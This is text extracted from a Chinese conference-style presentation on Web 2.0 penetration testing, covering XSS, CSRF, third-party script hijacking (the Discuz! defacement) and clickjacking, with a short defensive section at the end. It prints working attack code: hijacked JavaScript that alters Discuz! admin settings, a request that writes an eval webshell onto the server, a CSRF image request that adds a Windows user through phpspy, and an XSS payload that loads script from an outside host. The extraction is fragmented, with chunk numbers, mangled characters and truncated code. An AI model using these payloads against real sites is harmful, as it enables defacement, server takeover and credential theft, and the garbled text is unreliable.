web 20的滲透測(cè)試

1、WEB2.0下的滲透測(cè)試,5up3rh3i@gmail.com,WEB1.0下的滲透測(cè)試,通過(guò)web服務(wù)器漏洞直接溢出得到cmdshell iis60day.bin –t www.microsoft.com –p 80通過(guò)web應(yīng)用程序傳統(tǒng)漏洞得到webshell 傳統(tǒng)漏洞是指作用于web服務(wù)端語(yǔ)言的漏洞如上傳、sql注射、包含等。 phpwind0day.php –t www.phpwind.com –

2、p 80主要特點(diǎn) 屬于服務(wù)端攻擊，攻擊效果“直截了當(dāng)”，還是目前主流的滲透測(cè)試方式，但是尋找漏洞成本越來(lái)越高，安全產(chǎn)品的應(yīng)用使利用越來(lái)越困難！,關(guān)于WEB 2.0,Web2.0一種相對(duì)概念,提倡的是高親和力的交互應(yīng)用，主體是用戶之間用戶與網(wǎng)站之間的互動(dòng)。Web2.0的核心注重的不僅是技術(shù)，而更注重的設(shè)計(jì)思想。 AJAX技術(shù)的誕生標(biāo)著web進(jìn)入2.0時(shí)代，也是其核心技術(shù) web2.0更注重互動(dòng)的

3、設(shè)計(jì)思想 如博客、wiki、sns網(wǎng)絡(luò)等誕生Web2.0下的滲透繼承了web2.0的特點(diǎn)：思想更重要！,WEB2.0下的滲透測(cè)試,攻擊的目標(biāo)主要的攻擊方式：XSS、CSRF、第三方內(nèi)容劫持、Clickjacking等。攻擊方式的趨勢(shì)走向攻擊成功后的效果現(xiàn)有的認(rèn)識(shí)幾個(gè)滲透小故事,攻擊的目標(biāo),與WEB1.0相比，WEB2.0滲透是針對(duì)客戶端的攻擊。包括網(wǎng)站用戶，網(wǎng)站的管理員，網(wǎng)站的運(yùn)維、安全人員，還包括和你一樣的“滲透者”。

4、,主要的攻擊方式--XSS,XSS在web1.0誕生，在web2.0時(shí)代出名。 1996年就有人提到了這類(lèi)攻擊。[Jeremiah Grossman說(shuō)的] 1999年David Ross和Georgi Guninski提出“Script injection”。 2000年apache官方一篇文檔里正式取名“Cross Site Scripting”。 2005年samy worm

5、誕生，標(biāo)志著XSS進(jìn)入web2.0時(shí)代，xss火了?。?2007年出版的《XSS Attacks Book》提出：“XSS is the New Buffer Overflow, JavaScript Malware is the new shell code” XSS的利用： web1.0時(shí)代：彈筐[alert()]+收集cookie[document.cookie] web2.0時(shí)代

6、：xss worm 這也是目前xss的主流利用！我們思想還處于90年代！這也是廣大腳本小子被bs的原因之一！XSS =/= 彈筐+收集cookie+worm xss本質(zhì)是在于執(zhí)行腳本[javascript/html等]，而一個(gè)javascript就足夠讓你黑遍這個(gè)世界！,主要的攻擊方式--CSRF,CSRF---Cross Site Request Forgery 誕生于2000年，

7、火于2007/2008年。 得益于XSS的光芒，及幾大web2.0的應(yīng)用 如gmail的CSRF漏洞。直譯為：“跨站請(qǐng)求偽造”?！翱纭笔撬暮诵摹?* 跨http site ** 攻防技術(shù)已經(jīng)趨于成熟如《Bypass Preventing CSRF》2008年 對(duì)于csrf的防御 ** CSRF worm 我在2008.01年blog提到過(guò)這個(gè)概念

8、,2008.09 80sec實(shí)現(xiàn) 《百度Hi Csrf蠕蟲(chóng)攻擊》 * 跨協(xié)議通信《Inter-Protocol Communication》—by Wade Alcorn 2006年，讓通過(guò)客戶端攻擊用戶本地電腦其他服務(wù)變?yōu)榭赡?。如下代碼在webkit下實(shí)現(xiàn)了http與irc的通信：,gibson = document.createElement("form");gibson.setAttrib

9、ute("name","B");gibson.setAttribute("target","A");gibson.setAttribute("method","post");gibson.setAttribute("action","http://127.0.0.1:6677&quo

10、t;);gibson.setAttribute("enctype","multipart/from-data");crashoverride = document.createElement("textarea");crashoverride.setAttribute("name","C");postdata = "

11、USER A B C D \nNick xxxx\n";crashoverride.setAttribute("value",postdata);crashoverride.innerText = postdata;crashoverride.innerHTML = postdata;gibson.appendChild(crashoverride);document.body.appendCh

12、ild(gibson);gibson.submit();,主要的攻擊方式--CSRF,從其他應(yīng)用程序發(fā)起的跨站請(qǐng)求如word winrar等文件。,主要的攻擊方式--第三方內(nèi)容劫持,《The Dangers of Third Party Content》---by SanJose OWASP-WASCAppSec2007 2009年開(kāi)始天朝紅火了一把:《Dz事件》（在后面講具體提到）廣告業(yè)務(wù)、網(wǎng)頁(yè)游戲、統(tǒng)計(jì)服務(wù)導(dǎo)致

13、第三方內(nèi)容應(yīng)用廣泛。web應(yīng)用程序里的第三方內(nèi)容，比如bbs官方升級(jí)提示功能等其他應(yīng)用程序里的第三方內(nèi)容，如瀏覽器插件里的引入的js html等。包括JavaScript, HTML, Flash, CSS, etc.,主要的攻擊方式--第三方內(nèi)容劫持,又一個(gè)個(gè)“引狼入室”的悲劇故事。劫持第三方內(nèi)容的方法： *域名劫持如百度事件：直接攻擊域名注冊(cè)商 *會(huì)話劫持：如arp會(huì)話劫持（zxarps.exe ）、交換機(jī)會(huì)話劫

14、持（SSClone） *直接攻取第三方內(nèi)容服務(wù)器權(quán)限。 “恩，很黃很暴力！”目前基本沒(méi)有安全防御意識(shí)。 “你的安全被別人做了主了!”,主要的攻擊方式-- Clickjacking,Clickjacking--點(diǎn)擊劫持 * by Jeremiah Grossman and Robert Hansen in 2008 ，立刻紅火！ * WEB 2.0安全進(jìn)入“美工黑客”時(shí)代！ * 安全防御者的惡夢(mèng)，

15、一個(gè)新的http header誕生：X-Frame-Options衍生出的其他UI劫持 如： Tapjacking “觸摸劫持” ?,攻擊方式的趨勢(shì)走向,,攻擊方式越來(lái)越“猥瑣”，沒(méi)有最“猥瑣”只有更“猥瑣”。新的攻擊方式從誕生到紅火時(shí)間越來(lái)越短。,攻擊成功后的效果,從上面的攻擊方式來(lái)看，它們有一個(gè)共同的目標(biāo)：“劫持你的瀏覽器”。 “哪里有瀏覽器哪里就有攻擊！”“劫持你的瀏覽器”的效果就是你的“身份被劫

16、持”所以攻擊目標(biāo)的“身份”決定了“滲透思想”,攻擊成功后的效果,劫取你的隱私?網(wǎng)站的普通用戶 如常見(jiàn)的取得你ID、密碼、cookie、聯(lián)系等劫取你的權(quán)限?網(wǎng)站管理人員 如網(wǎng)站的后臺(tái)，進(jìn)一步通過(guò)后臺(tái)得到網(wǎng)站的權(quán)限等劫取你的系統(tǒng)?所有用戶 如利用瀏覽器的漏洞，或者通過(guò)跨協(xié)議利用你系統(tǒng)上其他服務(wù)的漏洞得到你的系統(tǒng)權(quán)限，或者取得本地系統(tǒng)上文件的讀寫(xiě)能力等劫取你的“內(nèi)網(wǎng)” ?公司成員，這個(gè)又因在內(nèi)網(wǎng)的身

17、份不同而不同，如分開(kāi)發(fā)測(cè)試員、運(yùn)維人員、內(nèi)部網(wǎng)絡(luò)管理人員、安全測(cè)試人員等等。 如通過(guò)攻擊程序員的開(kāi)發(fā)環(huán)境，直接取得內(nèi)網(wǎng)系統(tǒng)的權(quán)限,目前對(duì)于WEB2.0滲透測(cè)試的認(rèn)識(shí),Web2.0滲透==xss==彈筐+收集cookie+wormWeb2.0滲透==Mailxss?office等軟件0day釣魚(yú)Web2.0滲透==Xssshell、Beef、Anehta這些 xss攻擊平臺(tái)工具。看了

18、下面的幾個(gè)故事，或許有所改變,幾個(gè)滲透小故事,【黑遍全世界】----談?wù)劇癉z事件”【螳螂捕蟬】----談?wù)劇皾B透者自身的安全”【本地web開(kāi)發(fā)測(cè)試環(huán)境的安全隱患】【來(lái)自“漏洞庫(kù)”的漏洞】【是誰(shuí)想動(dòng)了我的奶酪?】,【黑遍全世界】之 “Dz事件”,名詞解釋： “Dz事件” 是指2009年1月8日一大批的Discuz!論壇的首頁(yè)被篡改為“Hacked by ring04h, just for fun!”的事件。官

19、方通告：“本次安全問(wèn)題系由域名劫持造成，Discuz! 各版本軟件代碼在安全上并無(wú)問(wèn)題 ”事件的根本原因是“第三方內(nèi)容劫持”，這里“第三方內(nèi)容”具體是指“后臺(tái)升級(jí)提示系統(tǒng)”引入位于http://customer.discuz.net 上的javascript代碼 Discuz!_5.5.0_SC_GBK\upload\admin\global.func.php ： echo '';

20、從官方通告來(lái)看ring04h正是通過(guò)攻擊 http://customer.discuz.net 這個(gè)域名來(lái)達(dá)到劫持這個(gè)js的目的！,被劫持后的http://customer.discuz.net/news.php 代碼片段：// 獲取FORMHASHxmlhttp.open("GET", siteurl+"admincp.php?action=home&sid="+sid, fa

21、lse);xmlhttp.send(null);var datas = xmlhttp.responseText;var reg = / name=\"formhash\" value=\"([\w\d]+)\"/i;var arr = reg.exec(datas);var formhash = arr[1];// 調(diào)用XMLHTTP POST自定義數(shù)據(jù)xmlht

22、tp.open("POST", siteurl+"admincp.php?action=settings&edit=yes", false);xmlhttp.setRequestHeader("Referer", siteurl);xmlhttp.setRequestHeader("Content-Type","applicatio

23、n/x-www-form-urlencoded");xmlhttp.send(unescape("settingsnew%5Bseohead%5D=%3Cscript%3Efunction+init%28%29+%7B+document.write%28%27Hacked+by+ring04h%2C+just+for+fun%21%27%29%3B%7Dwindow.onload+%3D+init%3B%3C%2

24、Fscript%3E%0D%0A&settingsubmit=+%CC%E1%BD%BB+&formhash="+formhash));}通過(guò)后臺(tái)“seo 設(shè)置”為過(guò)濾html的漏洞，插入js：function init() { document.write('Hacked by ring04h, just for fun!');}window.onload = init; 來(lái)達(dá)到

25、篡改主頁(yè)的目的！,,,本次事件是“善意”的，“惡意”的攻擊還在后頭??！結(jié)合其他后臺(tái)得到webshell的漏洞，可以直接控制整個(gè)被攻擊的論壇主機(jī),如： //通過(guò)SODB-2008-10寫(xiě)入webshell//http://www.80vul.com/dzvul/sodb/10/sodb-2008-10.txtxmlhttp.open("POST", siteurl+"admincp.p

26、hp?action=runwizard&step=3", false);xmlhttp.setRequestHeader("Referer", siteurl);xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");xmlhttp.se

27、nd(unescape("settingsnew%5Bbbname%5D=%3C%3F@eval($_POST[cmd])%3A%3F%3E&settingsnew%5Bsitename%5D=Comsenz+Inc.&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=+%CF%C2%D2%BB%B2%BD+&

28、;formhash="+formhash)); 直接把寫(xiě)入了forumdata/logs/runwizardlog.php文件里,在后續(xù)的“惡意”的攻擊,,跨應(yīng)用程序的“第三方內(nèi)容劫持”攻擊，讓你“黑遍全世界”,目前discuz就升級(jí)提示功能已經(jīng)放棄了使用引入第三方j(luò)s了，但是還有其他功能里有應(yīng)用。目前大多數(shù)應(yīng)用程序使用引入第三方j(luò)s：如phpwind,【螳螂捕蟬】,,,,【黃雀在后】攻擊者“螳螂”把捕獲的“蟬

29、”的密碼通過(guò)img發(fā)送給steal.php收集保存某個(gè)文件里或者數(shù)據(jù)庫(kù)里，然后后臺(tái)顯示管理，這個(gè)后臺(tái)管理就是攻擊者“黃雀”的目標(biāo)了：嘗試提交url：http://ha*****.com/steal.php?data=%3Cscript%20src%3Dhttp%3A%2F%2Fwww%2E80vul%2Ecom%2Fsobb%2Falert%2Ephp%3E%3C%2Fscript%3E,http://www.80vul.c

30、om/sobb/alert.php 的代碼：因?yàn)椴皇恰皭阂狻惫?，只是?jiǎn)單的收集了一下ip及referer[后臺(tái)url]。,【本地web開(kāi)發(fā)測(cè)試環(huán)境的安全隱患】,故事發(fā)生在2008年的一天，從一個(gè)圖片開(kāi)始…..,Phpspy缺少csrf的防御，我們可以嘗試下直接利用phpspy本身的“執(zhí)行命令”功能來(lái)攻擊開(kāi)發(fā)者(angel)的本地開(kāi)發(fā)環(huán)境。聯(lián)系angel得到phpspy2008的代碼，得到了“執(zhí)行命令”功能的提交方式，當(dāng)時(shí)構(gòu)造

31、代碼如下： var url = 'http://localhost/phpspy/2008.php?action=shell&execfunc=system&command=net user heige heige /add|echo fuck >c:\\heige.txt'; getURL(url);function getURL(s) {    v

32、ar image = new Image();    image.style.width = 0;    image.style.height = 0;    image.src = s;} 找了個(gè)借口讓angel訪問(wèn)了放置如上代碼的url……結(jié)果：因?yàn)闆](méi)有考慮ie的“隱私策略”導(dǎo)致cookie被攔截而失敗！但是這個(gè)思路是完全可行的

33、！,其他的一些思路： A:“Dz事件”的延續(xù) :,調(diào)用通過(guò)后臺(tái)得到的webshell： forumdata/logs/runwizardlog.php執(zhí)行系統(tǒng)命令，本地web服務(wù)器是apache的，一般都是用高權(quán)限運(yùn)行….xmlhttp.open("POST", siteurl+"forumdata/logs/runwizardlog.php", false);xmlhttp.setR

34、equestHeader("Referer", siteurl);xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");//執(zhí)行命令為net user 80vul 80vul /add 在實(shí)際hack中可以換為ftp tftp或者echo iget.vbs等方法下載并且執(zhí)行你

35、的程序xmlhttp.send("cmd=%6E%65%74%20%75%73%65%7,B:利用開(kāi)發(fā)編輯器的漏洞。如：,C:利用系統(tǒng)其他服務(wù)的漏洞比如某ftp軟件的溢出漏洞等，使用“跨協(xié)議通信”或者相關(guān)的協(xié)議攻擊本地。如：Sun Solaris 10 ftpd存在一個(gè)繞過(guò)驗(yàn)證執(zhí)行系統(tǒng)命令的漏洞，他可以通過(guò)ftp://直接在網(wǎng)頁(yè)里調(diào)用實(shí)現(xiàn)對(duì)本地的攻擊,一個(gè)挑戰(zhàn)：《HackGame No.1 》,【來(lái)自“漏洞庫(kù)”的漏洞

36、】,該故事發(fā)生在今年的5月由80vul發(fā)起的[SOBB]項(xiàng)目,在部分的漏洞公告里，我們預(yù)留了一個(gè)攻擊接口，目的是為了探測(cè)各大網(wǎng)絡(luò)媒體轉(zhuǎn)貼觸發(fā)的xss漏洞。不過(guò)一不小心直接跨進(jìn)了某著名網(wǎng)絡(luò)安全公司的內(nèi)網(wǎng)的“漏洞庫(kù)”:后續(xù)的攻擊？,【是誰(shuí)想動(dòng)了我的奶酪?】,80vul建立以來(lái)，有沒(méi)有人想黑我們呢？于是我們布置了一個(gè)簡(jiǎn)單的“網(wǎng)”：,Content-Type: text/htmlServer: Microsoft-IIS/7

37、.0X-Powered-By: PHP/5.2.12, Date: Sun, 28 Nov 2010 11:21:26 GMTContent-Length: 5993,【是誰(shuí)想動(dòng)了我的奶酪?】,用標(biāo)簽加載img.php后，用onload事件加載javascript文件anti.php這樣設(shè)計(jì)的目的：只有img.php和anti.php兩個(gè)文件都加載時(shí)，才說(shuō)明有“魚(yú)”進(jìn)網(wǎng)。防止別人單一提交的嘗試。,新時(shí)代的防御,加強(qiáng)培

38、訓(xùn)[一個(gè)永恒的主題,SDL的前提和精髓]本次探討的主題是“攻擊方式”，而不是“漏洞類(lèi)型”，也就是說(shuō)“攻擊方式”面向的不僅僅是程序開(kāi)發(fā)員！,新時(shí)代的防御,保護(hù)好你本地和內(nèi)網(wǎng)開(kāi)發(fā)測(cè)試環(huán)境及相關(guān)的web應(yīng)用服務(wù)。 1.與公司內(nèi)部網(wǎng)絡(luò)隔離。 2.在開(kāi)發(fā)測(cè)試的同時(shí)，不允許連接外網(wǎng)。 3.加強(qiáng)本地測(cè)試環(huán)境的安全設(shè)置，對(duì)開(kāi)源的應(yīng)用程序運(yùn)行前進(jìn)行大概的審查：如查找“http”對(duì)于開(kāi)發(fā)應(yīng)該加強(qiáng)對(duì)第三方內(nèi)容的審查和控制，特別是可以執(zhí)